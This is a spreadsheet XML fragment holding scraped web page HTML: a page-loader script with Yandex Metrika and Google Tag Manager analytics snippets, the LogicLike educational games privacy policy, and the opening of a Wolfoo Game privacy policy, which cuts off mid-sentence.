                    // IE11- doesn't support "loading.remove()"
                    document.body.contains(loading) &amp;&amp; document.body.removeChild(loading);
                    // loading.remove();
                }, 500);
            }
        }
    },
    isEverythingLoaded: function () {
        return this._amountOfLoadingItems === 0;
    },
    _</t>
  </si>
  <si>
    <t>loadStylesheets: function (stylesheets) {
        this._amountOfLoadingItems += stylesheets.length;
        stylesheets.forEach(function (stylesheet) {
            if (stylesheet[0] === '&lt;') {
                this._loadOldStylesheet(stylesheet);
                return;
            }
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.async = true;
            script.onload = function () {
                this.styleSheetLoaded(stylesheet);
            }.bind(this);
            script.onerror = function () {
                this.styleSheetLoaded(stylesheet);
            }.bind(this);
            script.src = stylesheet;
            document.getElementsByTagName('head')[0].appendChild(script);
        }.bind(this));
    },
    _loadOldStylesheet: function (stylesheet) {
        var head = document.head;
        var insertHtml = stylesheet.replace('&gt;', ' onload="PageLoader.styleSheetLoaded(this)" onerror="PageLoader.styleSheetLoaded(this)"&gt;');
        head.insertAdjacentHTML('beforeEnd', insertHtml);
    },
    _insertLoader: function (transparent) {
        var body = document.body;
        var classes = 'loader--with-transparent-bg animated fadeIn';
        if (!transparent) {
            classes = 'loader--with-bg';
        }
        var html = '&lt;div id="loading" class="' + classes + '"&gt;&lt;div id="loading-center-absolute"&gt;';
         ['one', 'two', 'three', 'four'].forEach(function (name) {
            html += '&lt;div class="object" id="object_'</t>
  </si>
  <si>
    <t>+ name + '"&gt;&lt;/div&gt;';
        });
        html += '&lt;/div&gt;&lt;/div&gt;';
        body.insertAdjacentHTML('afterbegin', html);
    },
    _waitContent: function () {
        this._amountOfLoadingItems++;
        document.addEventListener("DOMContentLoaded", function () {
            this.decrementAmountOfLoadingItems();
        }.bind(this));
    },
    init: function (stylesheets, waitContent) {
        this._insertLoader();
        this._loadStylesheets(stylesheets);
        if (waitContent) {
            this._waitContent();
        }
    },
    incrementAmountOfLoadingItems: function (transparent) {
        if (this._amountOfLoadingItems === 0) {
            this.insertLoaderTimer = setTimeout(function () {
                this._insertLoader(transparent);
                this.insertLoaderTimer = null;
            }.bind(this), this. LOADER_PENDING_TIME)</t>
  </si>
  <si>
    <t>;
        }
        this._amountOfLoadingItems++;
    },
    styleSheetLoaded: function (styleSheet) {
        if (styleSheet.href) {
            styleSheet = styleSheet.href;
        }
        if (this.loadedItems.indexOf(styleSheet) === -1) {
            this.loadedItems.push(styleSheet);
            this.decrementAmountOfLoadingItems();
        }
    }
};
    //--&gt;
&lt;/script&gt;
    &lt;/head&gt;
&lt;body             
    &gt;
    &lt;script type="text/javascript"&gt;PageLoader.init([],true);&lt;/script&gt;
    &lt;!-- Yandex. Metrika counter --&gt; &lt;script type="text/javascript" &gt; (function (d, w, c) { (w[c] = w[c] ||</t>
  </si>
  <si>
    <t>[]).push(function() { try { w.yaCounter30721283 = new Ya.Metrika({ id:30721283, params:window.yaParams, clickmap:true, trackLinks:true, accurateTrackBounce:true, triggerEvent: true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://cdn.jsdelivr.net/npm/yandex-metrica-watch/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); &lt;/script&gt; &lt;noscript&gt;&lt;div&gt;&lt;img src="https://mc.yandex.ru/watch/30721283" style="position:absolute; left:-9999px;" alt="" /&gt;&lt;/div&gt;&lt;/noscript&gt; &lt;!-- /Yandex. Metrika counter --&gt;&lt;!-- Google Tag Manager (noscript) --&gt; &lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TTNJSK" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt; &lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager (noscript) --&gt;&lt;script type="text/javascript"&gt;document.addEventListener("yacounter30721283inited", function(){ window["yaCounter30721283inited"] = true; })&lt;/script&gt;
        &lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;_x005F_x000D_
    &lt;meta http-equiv="Content-Style-Type" content="text/css"/&gt;_x005F_x000D_
    &lt;meta name="generator" content="Aspose. Words for .NET 22.6.0"/&gt;_x005F_x000D_
    &lt;title&gt;&lt;/title&gt;_x005F_x000D_
    &lt;style type="text/css"&gt;body {_x005F_x000D_
        line-height: 108%;_x005F_x000D_
        font-family: Calibri;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    h2, h3, h4, p {_x005F_x000D_
        margin:</t>
  </si>
  <si>
    <t>0pt 0pt 8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    li, table {_x005F_x000D_
        margin-top: 0pt;_x005F_x000D_
        margin-bottom: 8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    h2 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 18pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    h3 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: ' Times New Roman';_x005F_x000D_
        font-size: 13.5pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
    h4 {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .CommentSubject {_x005F_x000D_
        margin-bottom: 8pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 10pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .CommentText {_x005F_x000D_
        margin-bottom: 8pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 10pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .Footer {_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .Header {_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .ListParagraph {_x005F_x000D_
        margin-left: 5pt;_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        widows: 0;_x005F_x000D_
        orphans: 0;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
     .NoSpacing {_x005F_x000D_
        margin-bottom: 0pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-size: 11pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .NormalWeb {_x005F_x000D_
        margin-top: 5pt;_x005F_x000D_
        margin-bottom: 5pt;_x005F_x000D_
        line-height: normal;_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.</t>
  </si>
  <si>
    <t>CommentReference {_x005F_x000D_
        font-size: 8pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. Emphasis {_x005F_x000D_
        font-style: italic_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. FollowedHyperlink {_x005F_x000D_
        text-decoration: underline;_x005F_x000D_
        color: #954f72_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.</t>
  </si>
  <si>
    <t>Hyperlink {_x005F_x000D_
        text-decoration: underline;_x005F_x000D_
        color: #0000ff_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. Strong {_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span. UnresolvedMention {_x005F_x000D_
        color: #605e5c;_x005F_x000D_
        background-color: #e1dfdd_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\32  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 18pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\33  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 13.5pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.\34  {_x005F_x000D_
        font-family: 'Times New Roman';_x005F_x000D_
        font-size: 12pt;_x005F_x000D_
        font-weight:</t>
  </si>
  <si>
    <t xml:space="preserve">bold_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.a {_x005F_x000D_
        font-size: 10pt_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    span.a0 {_x005F_x000D_
        font-size: 10pt;_x005F_x000D_
        font-weight: bold_x005F_x000D_
    }&lt;/style&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;div&gt;&lt;p style="margin-bottom:9.95pt; text-align:center; line-height:normal; font-size:18pt"&gt;&lt;span_x005F_x000D_
        style="font-family:'Times New Roman'; font-weight:bold; color:#5f6061"&gt;LogicLike privacy and data processing policy&lt;/span&gt;_x005F_x000D_
&lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-bottom:9.95pt; line-height:normal"&gt;&lt;span style="-aw-import:ignore"&gt;&amp;#xa0;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-bottom:9.95pt; line-height:normal; font-size:14pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; letter-spacing:2.4pt"&gt;1. WHO IS RESPONSIBLE FOR PROCESSING YOUR DATA AND HOW TO CONTACT US&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;Your privacy is very important for us, and we will always use your personal information only for the purposes as described in this Privacy Policy.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p class="ListParagraph" style="margin-top:0.05pt; margin-right:42pt; line-height:101%; font-size:12pt"&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;This Privacy Policy applies to all of our&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt; font-weight:bold"&gt;games&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;,&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt; font-weight:bold"&gt;applications&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;,&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt; font-weight:bold"&gt;websites&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;and&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt; font-weight:bold"&gt;related services&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;, collectively referred here as our&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="line-height:101%; font-size:11.5pt; font-weight:bold"&gt;Service&lt;/span&gt;&lt;span&gt; including the apps &lt;/span&gt;&lt;span_x005F_x000D_
             style="letter-spacing:-0.15pt"&gt;on the links below&lt;/span&gt;&lt;span&gt;:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p class="ListParagraph" style="margin-top:0.05pt; margin-right:42pt; line-height:101%; font-size:12pt"&gt;&lt;span_x005F_x000D_
            style="-aw-import:ignore"&gt;&amp;#xa0;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p class="NoSpacing" style="margin-left:7.1pt; font-size:11.5pt"&gt;&lt;span style="font-family:'Times New Roman'"&gt;LogicLike: Games for kids&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p class="NoSpacing" style="margin-left:7.1pt; font-size:12pt"&gt;&lt;a_x005F_x000D_
            href="https://play.google.com/store/apps/details?id=com.logicappkids" style="text-decoration:none"&gt;&lt;span_x005F_x000D_
            class="Hyperlink" style="font-family:'Times New Roman'"&gt;https://play.google.com/store/apps/details?id=com.logicappkids&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    </t>
  </si>
  <si>
    <t>&lt;p class="NormalWeb" style="margin-top:14pt; margin-left:7.1pt; margin-bottom:14pt"&gt;&lt;span&gt;Brain Training Game&lt;/span&gt;&lt;br/&gt;&lt;a_x005F_x000D_
            href="https://play.google.com/store/apps/details?id=com.logicapp" style="text-decoration:none"&gt;&lt;span_x005F_x000D_
            class="Hyperlink"&gt;https://play.google.com/store/apps/details?id=com.logicapp&lt;/span&gt;&lt;/a&gt;&lt;span_x005F_x000D_
            class="Hyperlink"&gt;.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;It covers how we collect, use, disclose, transfer and store information received about users and/or information received about users’ computing device through their use of the Service. Your continued use of the Service after the effective date will be subject to the new Privacy Policy.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;We receive and/or you may be asked to provide your information (including personal information) any time you are in contact with us or use our Service. As described in greater detail below, we share your information (including personal information) with our affiliates and with third party partners (as defined below) and use it in ways consistent with this Privacy Policy.</t>
  </si>
  <si>
    <t>We may also use your information (including personal information) together with other information to provide and improve products.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;Please read the following to learn more about how we use your personal information. By using our Service, you promise us that:&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;ul type="square" style="margin:0pt; padding-left:0pt"&gt;_x005F_x000D_
        &lt;li style="margin-top:14pt; margin-left:27.58pt; margin-bottom:0pt; line-height:19.2pt; padding-left:8.42pt; font-family:serif; font-size:10pt; -aw-font-family:'Wingdings'; -aw-font-weight:normal; -aw-number-format:''"&gt;_x005F_x000D_
            &lt;span style="font-family:'Times New Roman'; font-size:11.5pt"&gt;You have read, understand and agree to this Privacy Policy;&lt;/span&gt;_x005F_x000D_
        &lt;/li&gt;_x005F_x000D_
        &lt;li style="margin-left:27.58pt; margin-bottom:0pt; line-height:19.2pt; padding-left:8.42pt; font-family:serif; font-size:10pt; -aw-font-family:'Wingdings'; -aw-font-weight:normal; -aw-number-format:''"&gt;_x005F_x000D_
            &lt;span style="font-family:'Times New Roman'</t>
  </si>
  <si>
    <t>; font-size:11.5pt"&gt;You are over 16 years of age (or have had your parent or guardian read and agree to this Privacy Policy for you);&lt;/span&gt;_x005F_x000D_
        &lt;/li&gt;_x005F_x000D_
        &lt;li style="margin-left:27.58pt; margin-bottom:14pt; line-height:19.2pt; padding-left:8.42pt; font-family:serif; font-size:10pt; -aw-font-family:'Wingdings'; -aw-font-weight:normal; -aw-number-format:''"&gt;_x005F_x000D_
            &lt;span style="font-family:'Times New Roman' ; font-size:11.5pt"&gt;You are a parent, legal guardian, or an authorized school employee in compliance with applicable laws if you use our services on behalf of a child.&lt;/span&gt;_x005F_x000D_
        &lt;/li&gt;_x005F_x000D_
    &lt;/ul&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;If you do not agree, or are unable to make this promise, you must not use our Service. In such case, if you are using our application you must:&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;ol type="1" style="margin:0pt; padding-left:0pt"&gt;_x005F_x000D_
        &lt;li style="margin-top:14pt; margin-left:31.62pt; margin-bottom:0pt; line-height:19.2pt; padding-left:4.38pt; font-family:'Times New Roman'; font-size:11.5pt"&gt;_x005F_x000D_
            &lt;span&gt;Delete your/your child’s account using the functionality found in “Settings” in the App, or contact us and request deletion of your/your child’s data;&lt;/span&gt;_x005F_x000D_
        &lt;/li&gt;_x005F_x000D_
        &lt;li style="margin-left:31.62pt; margin-bottom:0pt; line-height:19.2pt; padding-left:4.38pt; font-family:'Times New Roman'; font-size:11.5pt"&gt;_x005F_x000D_
            &lt;span&gt;Cancel any subscriptions using the functionality provided by Apple (if you are using iOS) or Google (if you are using Android);&lt;/span&gt;_x005F_x000D_
        &lt;/li&gt;_x005F_x000D_
        &lt;li style="margin-left:31.62pt; margin-bottom:14pt; line-height:19.2pt; padding-left:4.38pt; font-family:'Times New Roman'; font-size:11.5pt"&gt;_x005F_x000D_
            &lt;span&gt;And (c) delete the application from your devices.&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
    &lt;/ol&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;For the purpose of the General Data Protection Regulation 2016/679 and any implementing legislation (the "GDPR"),&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt; font-weight:bold"&gt;Logiclike LLC&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;(developer’s name – &lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt; font-weight:bold"&gt;LogicLike Educational Games&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;, referred to as “Logiclike”, “we”, “us”, “company” or “our”) will be the data controller responsible for any personal data we process.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;If you have any questions or concerns about&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt; font-weight:bold"&gt;Logiclike LLC&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;’s</t>
  </si>
  <si>
    <t xml:space="preserve">Privacy Policy, including those related to exercise any of your rights, please contact us through the game’s Help &amp;amp; Support, so we can reply to you more quickly. Or contact us through one of the following ways:&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;ul type="square" style="margin:0pt; padding-left:0pt"&gt;_x005F_x000D_
        &lt;li style="margin-top:14pt; margin-left:27.58pt; margin-bottom:0pt; line-height:19.2pt; padding-left:8.42pt; font-family:serif; font-size:10pt; -aw-font-family:'Wingdings'; -aw-font-weight:normal; -aw-number-format:''"&gt;_x005F_x000D_
            &lt;span style="font-family:'Times New Roman'; font-size:11.5pt"&gt;For privacy questions and exercising your rights via our privacy email:&lt;/span&gt;&lt;span_x005F_x000D_
                style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;a_x005F_x000D_
                href="mailto:%20office@logiclike.com" style="text-decoration:none"&gt;&lt;span class="Hyperlink"_x005F_x000D_
                                                                                         style="font-family:'Times New Roman'; font-size:11pt; color:#000000; -aw-import:spaces"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
                class="Hyperlink" style="font-family:'Times New Roman'; font-size:11.5pt; color:#000000"&gt;office@logiclike.com&lt;/span&gt;&lt;/a&gt;&lt;span_x005F_x000D_
                style="font-family:'Times New Roman'; font-size:11.5pt"&gt;;&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
        &lt;li style="margin-left:27.58pt; margin-bottom:14pt; line-height:19.2pt; padding-left:8.42pt; font-family:serif; font-size:10pt; -aw-font-family:'Wingdings'; -aw-font-weight:normal; -aw-number-format:''"&gt;_x005F_x000D_
            &lt;span style="font-family:'Times New Roman'; font-size:11.5pt"&gt;For general information please feel free to contact us via our customer service by email:&lt;/span&gt;&lt;span_x005F_x000D_
                style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;a_x005F_x000D_
                href="mailto:office@logiclike.com" style="text-decoration:none"&gt;&lt;span class="Hyperlink"_x005F_x000D_
                                                                                      style="font-family:'Times New Roman'; font-size:11.5pt; color:#000000"&gt;office@logiclike.com&lt;/span&gt;&lt;/a&gt;&lt;span_x005F_x000D_
                style="font-family:'Times New Roman'; font-size:11.5pt"&gt;.&lt;/span&gt;&lt;/li&gt;_x005F_x000D_
    &lt;/ul&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;For information collected under this Privacy Policy, the data controller is&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt; font-weight:bold"&gt;Logiclike LLC&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;, a company registered at V.Khoruzhey Str., building 25/3, office 905, Minsk, Belarus.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:9.95pt; margin-bottom:9.95pt; line-height:normal; font-size:14pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; letter-spacing:2.4pt"&gt;2. WHAT PERSONAL DATA WE COLLECT AND WHY&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    </t>
  </si>
  <si>
    <t>&lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;We may source, use and otherwise process your personal data in different ways. In all cases we are committed to protecting your personal data.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;In each of the sections listed below, we describe how we obtain your personal data and how we handle it.&lt;/span&gt;_x005F_x000D_
    &lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:9.95pt; margin-bottom:9.95pt; line-height:normal; font-size:14pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; letter-spacing:2.4pt"&gt;2.1 APPLICATIONS CUSTOMERS&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-top:14pt; margin-bottom:14pt; line-height:19.2pt"&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;We collect personal data related to users of our&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;&amp;#xa0;&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt; font-weight:bold"&gt;Applications&lt;/span&gt;&lt;span_x005F_x000D_
            style="font-family:'Times New Roman'; font-size:11.5pt"&gt;.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
    &lt;p style="margin-bottom:0pt; line-height:normal; font-size:12.5pt"&gt;&lt;span_x005F_x000D_
            style="font-fam</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta content="width=device-width, initial-scale=1.0" name="viewport"&gt;
&lt;title&gt;Wolfoo Game&lt;/title&gt;
&lt;meta content name="description"&gt;
&lt;meta content name="keywords"&gt;
&lt;link href="assets/img/logowfgame.png" rel="icon"&gt;
&lt;link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon"&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,600,600i,700,700i" rel="stylesheet"&gt;
&lt;link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"&gt;
&lt;link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet"&gt;
&lt;link href="assets/css/style.css" rel="stylesheet"&gt;
&lt;/head&gt;
 &lt;body&gt;
&lt;header id="header"&gt;
&lt;/header&gt;
&lt;main id="main"&gt;
&lt;div class="container row main-01"&gt;
&lt;div class="col-lg-2 "&gt;
&lt;ul class="row btn-01"&gt;
&lt;li class="btn btn-default btn-sub-01" style="background:#1da1f2;"&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li class="btn btn-primary btn-sub-01"&gt;&lt;a href="/privacy-policy.html"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;li class="btn btn-info btn-sub-02"&gt;&lt;a href="/terms-conditions.html"&gt;Terms &amp; Conditions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="col-lg-10" style="display: flex;align-items: center;"&gt;
&lt;h1 class="txt-policy"&gt;Privacy Policy&lt;/h1&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="container"&gt;
&lt;div class="row content"&gt;
&lt;div class="col-lg-12 pt-4 pt-lg-0"&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Wolfoo LLC was established with the goal of expanding access to high-quality educational games for kids
worldwide. We are dedicated to giving parents and children a fun, safe, and informative experience when play
games. We take your privacy and safety very seriously because we are aware that you are concerned about how
sensitive information about your family is used and shared.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;p&gt;
Wolfoo LLC built the Wolfoo Games For Kids as Freemium apps. This SERVICE is provided by Wolfoo LLC at no
cost and is intended for use as is.
 This page is used to inform visitors regarding my policies with the collection, use, and disclosure of
Personal Information if anyone decided to use my Service.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 We inform you that there may be pop-up ads or other child-targeted advertisements on our site, but they will
only be for Wolfoo LLC’s related products and/or services. Without limiting the aforementioned, Child Users
are prohibited from using external links.</t>
  </si>
  <si>
    <t xml:space="preserve">These links can only be accessed by Adult Users after they provide
a password or correctly answer a security question.
 &lt;/p&gt;
&lt;p&gt;
 This Privacy Policy describes the ways in which Wolfoo LLC (“Company,” “we,” “us” or “our”) collect, use,
and disclose information about you and the children who use your account through Wolfoogames.com, and any
other websites, applications and online services that link to this Policy (collectively, the “Services”).
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;p class="txt-condition"&gt;
If you choose to use my Service, then you agree to the collection and use of information in relation to this
policy. The Personal Information that I collect is used for providing and improving the Service. I will not
use or share your information with anyone except as described in this Privacy Policy.
</t>
  </si>
  <si>
    <t>The terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, which are
accessible at Wolfoo Games For Kids unless otherwise defined in this Privacy Policy.
 &lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Information Collection and Use
&lt;/h4&gt;
&lt;p&gt;
 In short, we either actively or passively gather information.</t>
  </si>
  <si>
    <t>We won't ask a child for more information
than is considered necessary.
 &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;i class="bi bi-check"&gt;&lt;/i&gt;(a) Information we collect actively from you
Currently, we do not collect any information directly from you, such as biological information, location
information, contact information, etc. If we change the type of information collected, we will mention it
